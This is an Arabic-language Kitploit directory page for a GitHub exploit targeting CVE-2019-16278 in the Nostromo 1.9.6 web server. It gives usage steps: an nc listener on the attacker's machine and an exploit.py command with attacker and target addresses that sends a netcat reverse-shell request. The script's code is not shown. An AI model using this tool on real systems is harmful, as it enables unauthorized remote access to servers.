Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/cancela24/cve-2019-16278-nostromo-1.9.6-rce
توليد الحمولةالاستغلالشيل كوداستغلال تطبيقات الويبالتعلم والتعليمأداة الوصول عن بعد
GitHubcancela24/cve-2019-16278-nostromo-1.9.6-rce

CVE-2019-16278-Nostromo-1.9.6-RCE

يحتوي هذا المستودع على استغلال لثغرة CVE-2019-16278 في خادم الويب Nostromo 1.9.6، مما يسمح بتنفيذ التعليمات البرمجية عن بعد عبر ثغرة اجتياز الدليل. يستخدم البرنامج النصي pwntools لإنشاء شل عكسي. للاستخدام التعليمي والاختبار المصرح به فقط.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

CVE-2019-16278-Nostromo-1.9.6-RCE

يحتوي هذا المستودع على استغلال (Exploit) للثغرة CVE-2019-16278 في خادم الويب Nostromo 1.9.6، مما يسمح بتنفيذ تعليمات برمجية عن بُعد عبر ثغرة تجاوز المسار (Directory Traversal). يستخدم السكريبت مكتبة pwntools لإنشاء شيل عكسي (Reverse Shell). لأغراض تعليمية واختبارات مصرّح بها فقط.

المتطلبات

  • Python 3.x
  • مكتبة pwntools

لتثبيت pwntools، استخدم:

root@kitploit:~
pip3 install pwntools

الاستخدام

الإعداد

  1. بدء مستمع (Listener): على جهاز المهاجم، ابدأ مستمعًا على المنفذ المحدد لاستقبال الشيل العكسي:

    root@kitploit:~
    nc -lvnp <منفذ-المهاجم>
    
  2. تشغيل السكريبت: استخدم الأمر التالي لتنفيذ سكريبت الاستغلال. استبدل القيم حسب الحاجة.

    root@kitploit:~
    python3 exploit.py --attacker-ip <ip-المهاجم> --attacker-port <منفذ-المهاجم> [-t ip-الهدف] [-p منفذ-الهدف]
    

مثال

root@kitploit:~
python3 exploit.py --attacker-ip 10.10.14.15 --attacker-port 4444 -t 10.10.10.165 -p 80

في هذا المثال:

  • --attacker-ip 10.10.14.15 هو عنوان IP لجهاز المهاجم.
  • --attacker-port 4444 هو المنفذ الذي يستمع عليه جهاز المهاجم لاستقبال الشيل العكسي.
  • -t 10.10.10.165 يحدد عنوان IP الهدف (الافتراضي هو 10.10.10.165).
  • -p 80 يحدد منفذ الهدف (الافتراضي هو 80).

خيارات السكريبت

تدفق السكريبت

  1. رسالة تحذير: تذكير المستخدم ببدء مستمع على جهاز المهاجم.
  2. بناء الحمولة: إنشاء طلب HTTP يحتوي على أمر الشيل العكسي باستخدام netcat (nc).
  3. تنفيذ الحمولة: إرسال الحمولة إلى الخادم الهدف ومحاولة استقبال شيل عكسي.
  4. إعادة المحاولة: إذا فشلت المحاولة الأولى، يعيد السكريبت المحاولة حتى 3 مرات مع تغذية راجعة لكل محاولة.

مثال لتدفق الشيفرة

في حالة النجاح، يجب أن تستقبل شيلًا عكسيًا على المستمع الخاص بك مع إمكانية الوصول إلى النظام الهدف.

إخلاء مسؤولية

هذا السكريبت مخصص للأغراض التعليمية والاختبارات المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. المخترع والمساهمون ليسوا مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة. استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن لاختبارها.

تنزيل الأداة
الخيارالوصفالافتراضي
-t, --targetعنوان IP للمضيف البعيد10.10.10.165
-p, --portالمنفذ على المضيف البعيد المستهدف80
--attacker-ipعنوان IP لجهاز المهاجم للشيل العكسيلا شيء (مطلوب)
--attacker-portمنفذ على جهاز المهاجم للشيل العكسيلا شيء (مطلوب)